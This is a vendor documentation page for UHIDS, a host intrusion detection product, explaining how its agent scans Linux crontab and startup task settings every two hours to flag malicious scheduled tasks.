Skip to Content

Malicious Scheduled Task Detection


UHIDS’ self-developed malicious scheduled task detection feature has behavior analysis methods for malicious scheduled tasks. By combining cloud-based big data analysis and static rules in the detection system, it can detect common hacker behaviors where scheduled tasks are used to hide and protect malicious processes and trojans.

Detection Principle

After installing the Agent client plugin, UHIDS automatically reads the contents from the common scheduled task directories and locations on the system. The read content is analyzed, and based on the specific task behavior, it is assessed for malicious activity, triggering an alert notification.

Detection Cycle

  • By default, the plugin checks every 2 hours when started.
  • After clearing the risk, the system will recheck the same risk within 2 hours. If the risk is fixed, the alert will be automatically deleted.

Detection Items

Detection ItemDescription
Crontab Scheduled Task DetectionDetection of scheduled tasks in Linux’ cron settings.
Startup Task DetectionDetection of startup tasks in Linux system startup settings.